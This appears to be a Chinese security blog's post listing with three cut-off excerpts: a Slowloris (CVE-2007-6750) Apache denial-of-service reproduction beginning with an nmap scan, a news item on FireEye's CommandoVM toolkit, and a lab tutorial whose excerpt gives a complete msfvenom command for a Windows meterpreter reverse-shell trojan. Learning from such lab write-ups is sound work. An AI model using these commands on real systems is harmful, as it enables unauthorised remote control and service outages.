@一只冷涵 · 2019-07-29CVE-2007-6750漏洞复现 漏洞原因 Apache HTTP服务器1.x和2.x允许远程攻击者通过部分HTTP请求导致拒绝服务(守护进程中断),如Slowloris所示,这与2.2.15之前版本中缺少mod_ReqTimeout模块有关 漏洞影响 Apache 1.x/2.x 漏洞复现 nmap -sV -p80 192.168.146.175(用nma ...
@一只冷涵 · 2019-05-25火眼推出Windows免费渗透测试套件 2019年3月28日,火眼发布了一个包含超过140个开源Windows渗透工具包,红队渗透测试员和蓝队防御人员均拥有了顶级侦察与漏洞利用程序集。该工具集名为“CommandoVM”。 安全工作者在对系统环境进行渗透测试时常常会自己配置虚拟机,如果是Linux的话 ...
@一只冷涵 · 2019-03-16木马如何侵”脑” 今天来讲一下通过Msfvenom生成的木马来入侵电脑 在命令行输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.203.129 LPORT=777 -f exe -o 1.exe -p是指定Payload,LHOST是设置自己的IP,LPORT是设置自己要反弹的端口,-f ...